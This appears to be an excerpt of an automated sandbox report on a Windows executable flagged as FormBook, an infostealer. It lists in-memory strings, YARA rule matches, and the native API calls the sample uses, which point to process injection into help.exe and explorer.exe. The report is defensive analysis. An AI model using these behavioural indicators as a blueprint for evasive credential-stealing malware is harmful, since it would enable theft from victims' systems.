          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004181B0 NtCreateFile,3_2_004181B0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00418260 NtReadFile,3_2_00418260
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004182E0 NtClose,3_2_004182E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00418390 NtAllocateVirtualMemory,3_2_00418390
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01779910
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017799A0 NtCreateSection,LdrInitializeThunk,3_2_017799A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01779860
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779840 NtDelayExecution,LdrInitializeThunk,3_2_01779840
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017798F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_017798F0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A50 NtCreateFile,LdrInitializeThunk,3_2_01779A50
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A20 NtResumeThread,LdrInitializeThunk,3_2_01779A20
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01779A00
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779540 NtReadFile,LdrInitializeThunk,3_2_01779540
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017795D0 NtClose,LdrInitializeThunk,3_2_017795D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779710 NtQueryInformationToken,LdrInitializeThunk,3_2_01779710
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779FE0 NtCreateMutant,LdrInitializeThunk,3_2_01779FE0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017797A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_017797A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779780 NtMapViewOfSection,LdrInitializeThunk,3_2_01779780
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01779660
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017796E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_017796E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779950 NtQueueApcThread,3_2_01779950
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017799D0 NtCreateProcessEx,3_2_017799D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177B040 NtSuspendThread,3_2_0177B040
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779820 NtEnumerateKey,3_2_01779820
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017798A0 NtWriteVirtualMemory,3_2_017798A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779B00 NtSetValueKey,3_2_01779B00
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177A3B0 NtGetContextThread,3_2_0177A3B0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A10 NtQuerySection,3_2_01779A10
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779A80 NtOpenDirectoryObject,3_2_01779A80
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779560 NtWriteFile,3_2_01779560
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177AD30 NtSetContextThread,3_2_0177AD30
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779520 NtWaitForSingleObject,3_2_01779520
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017795F0 NtQueryInformationFile,3_2_017795F0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177A770 NtOpenThread,3_2_0177A770
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779770 NtSetInformationFile,3_2_01779770
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779760 NtOpenProcess,3_2_01779760
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779730 NtQueryVirtualMemory,3_2_01779730
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177A710 NtOpenProcessToken,3_2_0177A710
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779670 NtQueryInformationProcess,3_2_01779670
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779650 NtQueryValueKey,3_2_01779650
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01779610 NtEnumerateValueKey,3_2_01779610
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017796D0 NtCreateKey,3_2_017796D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A50 NtCreateFile,LdrInitializeThunk,14_2_02E09A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09860 NtQuerySystemInformation,LdrInitializeThunk,14_2_02E09860
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09840 NtDelayExecution,LdrInitializeThunk,14_2_02E09840
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E099A0 NtCreateSection,LdrInitializeThunk,14_2_02E099A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_02E09910
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E096E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_02E096E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E096D0 NtCreateKey,LdrInitializeThunk,14_2_02E096D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_02E09660
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09650 NtQueryValueKey,LdrInitializeThunk,14_2_02E09650
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09FE0 NtCreateMutant,LdrInitializeThunk,14_2_02E09FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09780 NtMapViewOfSection,LdrInitializeThunk,14_2_02E09780
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09710 NtQueryInformationToken,LdrInitializeThunk,14_2_02E09710
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E095D0 NtClose,LdrInitializeThunk,14_2_02E095D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09540 NtReadFile,LdrInitializeThunk,14_2_02E09540
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A80 NtOpenDirectoryObject,14_2_02E09A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A20 NtResumeThread,14_2_02E09A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A00 NtProtectVirtualMemory,14_2_02E09A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09A10 NtQuerySection,14_2_02E09A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0A3B0 NtGetContextThread,14_2_02E0A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09B00 NtSetValueKey,14_2_02E09B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E098F0 NtReadVirtualMemory,14_2_02E098F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E098A0 NtWriteVirtualMemory,14_2_02E098A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0B040 NtSuspendThread,14_2_02E0B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09820 NtEnumerateKey,14_2_02E09820
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E099D0 NtCreateProcessEx,14_2_02E099D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09950 NtQueueApcThread,14_2_02E09950
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09670 NtQueryInformationProcess,14_2_02E09670
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09610 NtEnumerateValueKey,14_2_02E09610
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E097A0 NtUnmapViewOfSection,14_2_02E097A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09760 NtOpenProcess,14_2_02E09760
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0A770 NtOpenThread,14_2_02E0A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09770 NtSetInformationFile,14_2_02E09770
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09730 NtQueryVirtualMemory,14_2_02E09730
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0A710 NtOpenProcessToken,14_2_02E0A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E095F0 NtQueryInformationFile,14_2_02E095F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09560 NtWriteFile,14_2_02E09560
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E09520 NtWaitForSingleObject,14_2_02E09520
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0AD30 NtSetContextThread,14_2_02E0AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A81B0 NtCreateFile,14_2_003A81B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A8260 NtReadFile,14_2_003A8260
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A82E0 NtClose,14_2_003A82E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A8390 NtAllocateVirtualMemory,14_2_003A8390
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_004692720_2_00469272
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_00C8C5080_2_00C8C508
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_0046208E0_2_0046208E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 2_2_003F911F2_2_003F911F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 2_2_003F20502_2_003F2050
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B9603_2_0041B960
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041C2123_2_0041C212
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041CB213_2_0041CB21
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00408C503_2_00408C50
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B4933_2_0041B493
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00402D883_2_00402D88
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041CE0C3_2_0041CE0C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041CF163_2_0041CF16
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00BC911F3_2_00BC911F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017541203_2_01754120
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173F9003_2_0173F900
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018020A83_2_018020A8
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018028EC3_2_018028EC
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F10023_2_017F1002
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180E8243_2_0180E824
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A03_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B0903_2_0174B090
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F03DA3_2_017F03DA
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01802B283_2_01802B28
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FDBD23_2_017FDBD2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176EBB03_2_0176EBB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018022AE3_2_018022AE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01730D203_2_01730D20
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018025DD3_2_018025DD
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01802D073_2_01802D07
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E03_2_0174D5E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01801D553_2_01801D55
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017625813_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FD4663_2_017FD466
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174841F3_2_0174841F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180DFCE3_2_0180DFCE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01801FF13_2_01801FF1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01756E303_2_01756E30
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FD6163_2_017FD616
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01802EF73_2_01802EF7
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00BC20503_2_00BC2050
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E922AE14_2_02E922AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8DBD214_2_02E8DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFEBB014_2_02DFEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E92B2814_2_02E92B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E928EC14_2_02E928EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E920A814_2_02E920A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB09014_2_02DDB090
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A014_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9E82414_2_02E9E824
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8100214_2_02E81002
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCF90014_2_02DCF900
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE412014_2_02DE4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E92EF714_2_02E92EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE6E3014_2_02DE6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8D61614_2_02E8D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E91FF114_2_02E91FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8D46614_2_02E8D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD841F14_2_02DD841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E925DD14_2_02E925DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDD5E014_2_02DDD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF258114_2_02DF2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E91D5514_2_02E91D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E92D0714_2_02E92D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC0D2014_2_02DC0D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ACB2114_2_003ACB21
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00398C5014_2_00398C50
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00392D9014_2_00392D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00392D8814_2_00392D88
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ACE0C14_2_003ACE0C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ACF1614_2_003ACF16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_00392FB014_2_00392FB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: String function: 0173B150 appears 45 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 02DCB150 appears 35 times
          Source: s6G3ZtvHZg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: s6G3ZtvHZg.exe, 00000000.00000002.259685906.0000000007520000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000000.00000000.234473638.0000000000524000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.258856185.0000000006E40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.259599436.0000000007420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000002.00000002.248880539.00000000004B4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000003.00000002.294686922.00000000019BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exe, 00000003.00000000.249711283.0000000000C84000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exeBinary or memory string: OriginalFilenameSyncSortedList.exe> vs s6G3ZtvHZg.exe
          Source: s6G3ZtvHZg.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
